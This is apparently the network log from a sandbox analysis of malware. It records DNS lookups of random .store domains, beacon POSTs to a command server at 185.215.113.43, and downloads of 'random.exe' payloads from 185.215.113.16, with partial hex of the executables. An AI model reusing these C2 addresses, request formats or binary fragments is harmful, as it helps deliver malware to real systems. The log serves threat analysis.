Nov 5, 2024 20:52:44.165653944 CET	1.1.1.1	192.168.2.6	0x6f81	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.166390896 CET	1.1.1.1	192.168.2.6	0x4b79	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.166390896 CET	1.1.1.1	192.168.2.6	0x4b79	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.166425943 CET	1.1.1.1	192.168.2.6	0xaff9	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 5, 2024 20:52:44.199959040 CET	1.1.1.1	192.168.2.6	0x98a6	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 5, 2024 20:52:44.200304985 CET	1.1.1.1	192.168.2.6	0xfbc8	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.200304985 CET	1.1.1.1	192.168.2.6	0xfbc8	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.674467087 CET	1.1.1.1	192.168.2.6	0xd7ac	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:44.674467087 CET	1.1.1.1	192.168.2.6	0xd7ac	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.826689005 CET	1.1.1.1	192.168.2.6	0x8d54	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:44.826689005 CET	1.1.1.1	192.168.2.6	0x8d54	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.955854893 CET	1.1.1.1	192.168.2.6	0x299d	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:44.955854893 CET	1.1.1.1	192.168.2.6	0x299d	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.978192091 CET	1.1.1.1	192.168.2.6	0x1b2f	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:48.220067024 CET	1.1.1.1	192.168.2.6	0xa5f6	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:48.220067024 CET	1.1.1.1	192.168.2.6	0xa5f6	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:49.244597912 CET	1.1.1.1	192.168.2.6	0xa5f6	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:49.244597912 CET	1.1.1.1	192.168.2.6	0xa5f6	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:50.255656958 CET	1.1.1.1	192.168.2.6	0xa5f6	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:50.255656958 CET	1.1.1.1	192.168.2.6	0xa5f6	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:52.271182060 CET	1.1.1.1	192.168.2.6	0xa5f6	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:52.271182060 CET	1.1.1.1	192.168.2.6	0xa5f6	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:55.223689079 CET	1.1.1.1	192.168.2.6	0xb6e0	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:55.264000893 CET	1.1.1.1	192.168.2.6	0x54d3	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:55.289223909 CET	1.1.1.1	192.168.2.6	0xfac6	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:55.326411963 CET	1.1.1.1	192.168.2.6	0xde4e	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:55.395018101 CET	1.1.1.1	192.168.2.6	0x651e	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:56.324779987 CET	1.1.1.1	192.168.2.6	0xa5f6	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:56.324779987 CET	1.1.1.1	192.168.2.6	0xa5f6	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:02.115407944 CET	1.1.1.1	192.168.2.6	0xe5e9	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:53:02.115407944 CET	1.1.1.1	192.168.2.6	0xe5e9	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:03.146776915 CET	1.1.1.1	192.168.2.6	0x69fc	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:53:05.170556068 CET	1.1.1.1	192.168.2.6	0xea7a	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:53:05.170556068 CET	1.1.1.1	192.168.2.6	0xea7a	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:05.292709112 CET	1.1.1.1	192.168.2.6	0x18f4	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 5, 2024 20:53:05.292721987 CET	1.1.1.1	192.168.2.6	0x1bd4	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:05.292721987 CET	1.1.1.1	192.168.2.6	0x1bd4	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:05.292963982 CET	1.1.1.1	192.168.2.6	0xea82	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:05.292963982 CET	1.1.1.1	192.168.2.6	0xea82	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:05.293392897 CET	1.1.1.1	192.168.2.6	0x9a2b	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 5, 2024 20:53:05.314538956 CET	1.1.1.1	192.168.2.6	0xf174	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 5, 2024 20:53:05.314806938 CET	1.1.1.1	192.168.2.6	0xd109	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:05.314806938 CET	1.1.1.1	192.168.2.6	0xd109	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:06.177278996 CET	1.1.1.1	192.168.2.6	0xea7a	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:53:06.177278996 CET	1.1.1.1	192.168.2.6	0xea7a	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:07.193840027 CET	1.1.1.1	192.168.2.6	0xea7a	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:53:07.193840027 CET	1.1.1.1	192.168.2.6	0xea7a	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:09.200335979 CET	1.1.1.1	192.168.2.6	0xea7a	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:53:09.200335979 CET	1.1.1.1	192.168.2.6	0xea7a	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:13.240673065 CET	1.1.1.1	192.168.2.6	0xea7a	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:53:13.240673065 CET	1.1.1.1	192.168.2.6	0xea7a	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:17.364746094 CET	1.1.1.1	192.168.2.6	0x3df6	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:04.136745930 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 5, 2024 20:52:05.028881073 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:06.552874088 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 5, 2024 20:52:07.474062920 CET	558	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 66 0d 0a 20 3c 63 3e 31 30 30 34 31 39 34 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 34 31 39 35 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 34 31 39 36 30 33 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 34 31 39 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 [TRUNCATED] Data Ascii: 16f <c>1004194001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1004195001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1004196031+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1004197001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:07.483280897 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 5, 2024 20:52:08.385762930 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:08 GMT Content-Type: application/octet-stream Content-Length: 3181568 Last-Modified: Tue, 05 Nov 2024 18:57:23 GMT Connection: keep-alive ETag: "672a6a93-308c00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 90 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 30 00 00 04 00 00 11 1e 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELSgJ0@01@Th@ @.rsrc@@.idata @hskfpfnm**@esxidcrg0d0@.taggant00"j0@
Nov 5, 2024 20:52:08.385788918 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:08.385804892 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:08.385991096 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:08.386051893 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:08.386069059 CET	1236	IN	Data Raw: 4d fc bb 60 76 4d ca 00 32 0f 3e 6a 30 f3 b9 a6 76 ef fa 60 eb c3 da 5c 59 0f 65 7e 76 0f be fb 72 23 3b 68 76 f3 bc f9 b5 86 f2 5c 66 86 76 75 76 0f be e0 f3 7b c1 f9 32 23 c6 85 da 23 ce f5 32 23 0e f9 32 23 b2 f5 32 23 26 f9 32 23 b6 f5 32 23 Data Ascii: M`vM2>j0v`\Ye~vr#;hv\fvuv{2##2#2#2#&2#2#2#2#r#+9=4>`v;<#2#`(v#`n@@xru\ny(u\=\\bvZ`tv`HMQ`v25>j4v`\|tp`~2
Nov 5, 2024 20:52:08.386085987 CET	1236	IN	Data Raw: 4d 03 ed 89 40 4e ce 77 f2 9b be 60 76 86 02 5c 6a 98 fa 5c 1e 86 fa 5c 66 48 be 60 76 0c 32 3c 12 1b 36 81 a3 60 a6 8c eb f3 da 7c 15 70 32 3c 12 2f 36 81 67 ba 88 fa c2 23 ba fb 2a 23 d6 77 80 1b c5 fb da 23 ce f9 58 87 f3 67 ed 6e 8a 9b ed c3 Data Ascii: M@Nw`v\j\\fH`v2<6`\|p2</6g##w#Xgnt@Cf\rxNNR(445m^`t[#+j#!`L)`v@gaE68x~fp@tM`v\`O)bN2\|xw`N*#w`vvO
Nov 5, 2024 20:52:08.386146069 CET	1236	IN	Data Raw: 0e 0e be 60 ed f3 da 70 af c3 da 48 71 0f be 60 4b 29 78 3c 12 3d d1 6f 5d ca 97 7c 76 0f 28 8b ed f3 da 70 af c3 da 48 70 0f be 60 af c3 da 74 76 0f be 60 ed 45 64 b5 aa 5b 71 6f 54 4e 93 63 f3 61 bf f6 1a 91 35 90 bd e4 18 1e d0 74 94 fa a5 86 Data Ascii: `pHq`K)x<=o]\|v(pHp`tv`Ed[qoTNca5tN,}is}IXHTj?6<;5g\|uQ0\|&}?648>2pgzv3<'^4g}GcoKN,}js\|aN=\cx"\g`v<m2#
Nov 5, 2024 20:52:08.386161089 CET	1236	IN	Data Raw: 2a 23 b2 f9 a8 8e a5 61 72 0f be fb 2a 23 ce e3 5d 0f 2c 62 ed 41 34 4c 12 86 2a 5c 26 98 fa 5c 66 86 fa 5c 22 6c 11 5c 26 3e 7e fb 2a 23 b6 6f b4 0f b6 60 76 1c 4a a0 59 03 79 30 d1 c3 be e1 7d 0c be 60 72 f4 dc 89 b6 56 9d 8a ad 6a 9b 80 56 ad Data Ascii: #ar#],bA4L\&\f\"l\&>~#o`vJYy0}`rVjV`]YWo_8v^j`JbvE\x<7"\n&r/=mn1#bx<7"#@huE0\|~fv@bv)LQ.D\`v`vc^4<n`w
Nov 5, 2024 20:52:08.386174917 CET	1236	IN	Data Raw: 12 80 7e 65 0c 5f 34 ec 12 03 2a 46 ed 71 3a 82 73 f3 c7 be 33 03 ee e3 b3 02 33 7c 12 98 0a 5c 6a 0e 8e fc b6 0a 34 04 12 03 3b 68 71 1c 3c 41 73 0f be f5 26 0b 34 b3 b5 78 bb 23 f3 60 b6 fb c2 23 ce ec 0d 86 ca 5c b5 60 bb 51 a4 98 2a 5c 72 44 Data Ascii: ~e_4Fq:s33\|\j4;hq<As&4x#`#\`Q\rDN?PA)b\r&#b#;j\r<tt?PD\|?PP?4P?w"f?PDL?PP?4+P?;~wfXbv5M`vx2#cj?6<<;<##8\,v
Nov 5, 2024 20:52:08.390832901 CET	1236	IN	Data Raw: ed db da 20 73 1b da fb 22 23 c6 77 f2 95 b9 60 76 75 f9 5c 6e 0e cf fd a7 0e be 60 eb db da 20 f1 46 3e 49 4d 41 bc 60 76 86 77 fb 32 23 c2 fb 2a 23 fe 59 b5 82 75 77 e8 a2 bd 60 76 86 ae 5a 7e 02 be 62 76 0f 35 ba 3d 4e 21 62 ed 41 3a e5 6e 0f Data Ascii: s"#w`vu\n` F>IMA`vw2##Yuw`vZ~bv5=N!bA:n)bY8D 5hoaA:s\/x?u/5N6\|T3+-/}e$5a"#Ecw\|hNNN~}11zGOEp\|t>DP/@E

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:12.990466118 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 31 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004194001&unit=246122658369
Nov 5, 2024 20:52:13.908803940 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:13.917836905 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 5, 2024 20:52:14.829463005 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:14 GMT Content-Type: application/octet-stream Content-Length: 2157568 Last-Modified: Tue, 05 Nov 2024 18:57:36 GMT Connection: keep-alive ETag: "672a6aa0-20ec00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 80 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 73 00 00 04 00 00 ef 18 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng,s@s!@P.d. p.v@.rsrc .@.idata .@ *.@olexbnfi@0Y<@abdjuqmyps @.taggant0s" @
Nov 5, 2024 20:52:14.829482079 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:14.829500914 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:14.829516888 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:14.829536915 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:14.829557896 CET	1236	IN	Data Raw: d2 05 20 bc 46 9e 83 f3 c0 45 65 a3 f9 1b 87 5a 24 69 64 21 be 8b 42 3a 4e ac e7 4f 82 b9 71 92 b9 eb 29 47 40 38 04 09 73 9e 9e 6a d7 54 00 42 39 78 8d e1 f6 93 88 21 78 b0 e9 1c b6 99 71 29 d7 d6 45 75 c3 40 c6 d8 9b 25 a2 a1 fe d5 4e d1 d6 18 Data Ascii: FEeZ$id!B:NOq)G@8sjTB9x!xq)Eu@%NFk:3;BwA@!@,GemHkw3jl1vD1u}l0lR*ASn{yBx6P$w;WWWWWWW W$aZDkG@_x};}
Nov 5, 2024 20:52:14.829575062 CET	848	IN	Data Raw: 38 a6 d7 20 c5 00 51 48 14 81 78 8f 9d a8 f7 9a a2 24 c7 df d4 94 be 47 0d dc 4a 39 e4 66 df 79 6c 54 bc 13 0e cb b1 bc 9a 9d 6e b2 3c 9c ad 46 f9 8d a2 6f 0d d6 ca ef d8 b1 a5 36 c9 50 b4 30 d4 e2 06 41 e6 50 7c c0 06 43 b8 bb 5b 4e 71 b3 af 15 Data Ascii: 8 QHx$GJ9fylTn<Fo6P0AP\|C[Nqvr.i;,qo9\h`IChDfsi A537^tkBeC-Lo`@x"gb~Il?T 2&;-
Nov 5, 2024 20:52:14.829591990 CET	1236	IN	Data Raw: d8 f5 87 37 c5 d0 a3 33 1d 4c ca 7b a6 e8 02 49 60 b1 4a 50 c4 bc b3 9a de 08 e4 71 3c b9 31 49 35 40 cc 48 bf 38 a2 48 64 a1 18 4c fc d8 ce 42 76 58 79 3f 80 18 00 12 29 fb c5 3c fc 70 79 1b 31 d7 e6 50 b0 b0 0e 72 a4 0c a4 4f 1a 36 79 71 88 f7 Data Ascii: 73L{I`JPq<1I5@H8HdLBvXy?)<py1PrO6yq?$\|HWHk<{S@Xs8PO$(H\7L15qhH\|6y'9T7oKw5`HH#q5R"Q-Weh
Nov 5, 2024 20:52:14.829607964 CET	1236	IN	Data Raw: 3f d8 ca 5b f4 a9 70 3f 77 d8 98 9a d8 99 60 48 a3 a5 77 0b 68 aa 73 0f c6 b1 53 41 8a 59 c0 5f a0 98 8c b8 cc 66 85 f4 de a9 63 fb 49 e0 97 48 f0 14 a7 db db bc 78 3c fc d2 78 8b bd 23 7c eb 67 c3 97 ff c5 0c e4 76 26 bb d7 29 c1 20 79 50 4c a1 Data Ascii: ?[p?w`HwhsSAY_fcIHx<x#\|gv&) yPLPhw:`yql1WReg]#-+wx?D(M7ws^8h0Pth:6ynY8_otQG<>+
